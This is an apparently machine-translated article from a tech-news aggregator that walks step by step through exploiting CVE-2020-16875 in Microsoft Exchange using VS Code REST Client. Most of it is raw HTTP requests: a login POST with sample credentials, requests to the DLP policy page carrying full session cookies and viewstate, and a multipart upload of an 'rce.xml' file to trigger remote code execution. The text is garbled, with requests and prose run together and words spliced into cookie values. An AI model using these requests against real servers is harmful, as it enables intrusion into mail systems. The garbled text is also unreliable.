Shulou(Shulou.com)05/31 Report--

This article mainly introduces "how to use vscode rest client to analyze CVE-2020-16875 vulnerabilities". In daily operation, I believe many people have doubts about how to use vscode rest client to analyze CVE-2020-16875 vulnerabilities. Xiaobian consulted all kinds of materials and sorted out simple and easy-to-use methods of operation. I hope it will be helpful to answer the doubts of "how to use vscode rest client to analyze CVE-2020-16875 vulnerabilities"! Next, please follow the editor to study!

Define several variables @ target=target@username=info2002@password=123456abc first step, login authentication, mainly to obtain the user's authorization cookie,## trigger RCE is a prerequisite, is to have an account password that can be logged in. # # if the login is successful, a 302 jump is returned. The Location address is the cookie returned by https://{{target}}/owa## itself, and the next step is to use POST https://{{target}}/owa/auth.owaContent-Type: application/x-www-form-urlencodeddestination= https://{{target}}/owa&flags=&username={{username}}&password={{password}}&forcedownlevel=0&passwordText=&isUtf8=1 to obtain viewstate information. # Note to add cookie information. Cookie returns # POST from the previous step returns a page that submits the DLP policy, which contains a form for uploading the xml page. # the key to RCE trigger is to upload a constructed xml### search _ _ VIEWSTATE form and find the back-up value backup POST https://{{target}}/ecp/DLPPolicy/ManagePolicyFromISV.aspxCookie: cadata=PNFf9JJYWv0YzkoX5j6QkPv8joj1HGPxf+y5Qv8HuWCTH0aU8z3dCjjan55k8a6PCKn5EdyZJODa2xaVXd26v0ctAWb9M6HR00K0ox5G0bc=; path=/; secure; HttpOnly,cadataTTL=d6qg8liD1i8O8eDQG6dihg==; path=/; secure; HttpOnly,cadataKey=f7uGUtHEafk0woO1GxggVfWuqzLNXJCa51DcVRzzJLYXKByQJubmtzx3WDGrKoLOQyDVt11c4EtBYIQHPXojnLulHRU8fdqoZLCQoPQm6hlxS3XxKBVwZlXMig1UpRCufLLVpvKuVPVdcl54H2mOB0mqlyryTIETcvBP5Amf/3f1abY3De72kva9VSY6m/ETgnjAxA8XpXyipaYBTG87Rq9OZGszXeIxNGAZ6ZA7wfzEQ0BvG+pVFqeYxhXnm3BnYo+6JGuV5X3+kR1hjyLK12AzDR+3fdkOar0xTwkON6fp44PxcqxHMhCDAtCHCD1NEv8wlJzcE8ze614rV+q8zQ==; path=/; secure; HttpOnly,cadataIV=ctnfcTb/AroSCXjUeyq7OYe2GvlksJYDTlmVv6ushP0ai+6/EtfwnaP2imYOhylwIAI1uhh+YFVNghyNaZ51P6w3RCPAJ+RzpUC+AhsxKVs1A9YL8U64hyMe6LkKz/1QqQG+AMot/DYKpqOw3LKnVXsyxJ7XA84G7NjGPQRu4/TQ/e3BaJgSp3QSfnRjQJ9nkbeIKN/iz/vT3nwLw5MIhueTVb3qvXP2YdEJ7JQcEnSuHN/ggwA5AkXzxDClj/DKntFx7f8DduYhQ+SAAOz0QAs4eu954PIVVJiAvb+PMvqJWbCx2/f7prO6u8nyjJz+j3poOV+EmdtFy77DjAB/w==; path=/; secure The third step of HttpOnly,cadataSig=pkEzUP6+8+ugbBpiNxji+eTVagD/JROaWaKO+e3Nsszri6f+xM7eI5oiOGU637ENE8HgW65EKWIyqwjagSIo60PF0mLvSLKGAKCbhlVU7zX0cVlBeYYBidQhnxYV8KflCBJIL9MbDQ9emwH/HdOBS48JJALybzZ/nIiQeIfJsz0ycQS2DUrUCj2qHqDeXDnqrzGNpDtdeNoe0ADc2zm/bKl59N9YgQkYNuz1OArknrhmj/H0FwDUiEB38cg4I+ckZypvVJwMX1V5rG3Csml7BVgMWaDbo6PP9RYALLF28IxhQ62tDgkXn8ltGcdlo7hdWvGvjEfH1I0s5CuT7qwnEw==; path=/; secure; HttpOnly is to trigger RCE (not recommended) # similarly, cookie information cannot be lost. Take the second step of viewstate information to build a malicious xml, complete RCE.### is not recommended to perform this step, trigger you to ensure that your server environment is not affected. # basically, you can confirm that RCE vulnerabilities will be included in the second step. POST https://{{target}}/ecp/DLPPolicy/ManagePolicyFromISV.aspxCookie: cadata=PNFf9JJYWv0YzkoX5j6QkPv8joj1HGPxf+y5Qv8HuWCTH0aU8z3dCjjan55k8a6PCKn5EdyZJODa2xaVXd26v0ctAWb9M6HR00K0ox5G0bc=; path=/; secure; HttpOnly,cadataTTL=d6qg8liD1i8O8eDQG6dihg==; path=/; secure; HttpOnly,cadataKey=f7uGUtHEafk0woO1GxggVfWuqzLNXJCa51DcVRzzJLYXKByQJubmtzx3WDGrKoLOQyDVt11c4EtBYIQHPXojnLulHRU8fdqoZLCQoPQm6hlxS3XxKBVwZlXMig1UpRCufLLVpvKuVPVdcl54H2mOB0mqlyryTIETcvBP5Amf/3f1abY3De72kva9VSY6m/ETgnjAxA8XpXyipaYBTG87Rq9OZGszXeIxNGAZ6ZA7wfzEQ0BvG+pVFqeYxhXnm3BnYo+6JGuV5X3+kR1hjyLK12AzDR+3fdkOar0xTwkON6fp44PxcqxHMhCDAtCHCD1NEv8wlJzcE8ze614rV+q8zQ==; path=/; secure; HttpOnly,cadataIV=ctnfcTb/AroSCXjUeyq7OYe2GvlksJYDTlmVv6ushP0ai+6/EtfwnaP2imYOhylwIAI1uhh+YFVNghyNaZ51P6w3RCPAJ+RzpUC+AhsxKVs1A9YL8U64hyMe6LkKz/1QqQG+AMot/DYKpqOw3LKnVXsyxJ7XA84G7NjGPQRu4/TQ/e3BaJgSp3QSfnRjQJ9nkbeIKN/iz/vT3nwLw5MIhueTVb3qvXP2YdEJ7JQcEnSuHN/ggwA5AkXzxDClj/DKntFx7f8DduYhQ+SAAOz0QAs4eu954PIVVJiAvb+PMvqJWbCx2/f7prO6u8nyjJz+j3poOV+EmdtFy77DjAB/w==; path=/; secure; HttpOnly,cadataSig=pkEzUP6+8+ugbBpiNxji+eTVagD/JROaWaKO+e3Nsszri6f+xM7eI5oiOGU637ENE8HgW65EKWIyqwjagSIo60PF0mLvSLKGAKCbhlVU7zX0cVlBeYYBidQhnxYV8KflCBJIL9MbDQ9emwH/HdOBS48JJALybzZ/nIiQeIfJsz0ycQS2DUrUCj2qHqDeXDnqrzGNpDtdeNoe0ADc2zm/bKl59N9YgQkYNuz1OArknrhmj/H0FwDUiEB38cg4I+ckZypvVJwMX1V5rG3Csml7BVgMWaDbo6PP9RYALLF28IxhQ62tDgkXn8ltGcdlo7hdWvGvjEfH1I0s5CuT7qwnEw==; path=/; secure; HttpOnlyContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW-WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data Name= "ctl00 $ResultPanePlaceHolder$senderBtn" ResultPanePlaceHolder_ButtonsPanel_btnNext-WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name= "_ _ VIEWSTATE" / wEPDwUILTg5MDAzMDFkZKEgV4rq2832c5ZF38whYPpaizHg-WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name= "ctl00 $ResultPanePlaceHolder$contentContainer$name" anytexthere-WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name= "ctl00 $ResultPanePlaceHolder$contentContainer$upldCtrl" Filename= "rce.xml" Content-Type: <. / rce.xml-WebKitFormBoundary7MA4YWxkTrZu0gW-- post a constructed XML4si here, and the study on "how to use vscode rest client to analyze CVE-2020-16875 vulnerabilities" is over. I hope you can solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.